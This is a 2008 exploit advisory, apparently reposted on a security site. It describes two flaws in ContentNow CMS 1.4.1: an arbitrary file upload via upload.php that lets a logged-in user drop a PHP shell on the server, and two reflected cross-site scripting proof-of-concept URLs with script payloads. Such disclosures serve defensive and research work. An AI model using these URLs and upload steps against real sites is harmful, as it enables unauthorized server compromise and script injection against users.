ContentNow 1.4.1 (Upload/XSS) Multiple Remote Vulnerabilities

2008.07.16
Credit: CWH
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

=============================================================== ContentNow CMS (Upload/XSS) Multiple Remote Vulnerabilities =============================================================== ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 6 July 2008 SITE : cwh.citec.us ##################################################### APPLICATION : Content CMS VERSION : 1.4.1 VENDOR : http://www.contentnow.mf4k.de DOWNLOAD : http://downloads.sourceforge.net/contentnow/contentNow_141.zip ##################################################### --- Arbitrary File Upload --- This Vulnerability can upload malicious files direct to web server. [Login as user] [+] Upload Path: http://[Target]/[contentNow_path]/upload.php?path=/[contentNow_path]/upload/ [-] Example: http://192.168.24.25/contentNow/cn/upload.php?path=/contentNow/upload/ [+] Shell Script: http://[Target]/[contentNow_path]/upload/file/[Evil File] [-] Example: http://192.168.24.25/contentNow/upload/file/myshell.php --- Remote XSS Exploit --- ------------- POC Exploit ------------- [+] http://192.168.24.25/contentnow/upload/file/language_menu.php/>"><script>alert("XSS")</script> [+] http://192.168.24.25/contentnow/upload/file/language_menu.php?pageid=>"><script>alert("XSS")</script>&clang=en ################################################################## Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos ##################################################################

References:

http://www.securityfocus.com/bid/30102
http://www.milw0rm.com/exploits/6011
http://secunia.com/advisories/30888


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top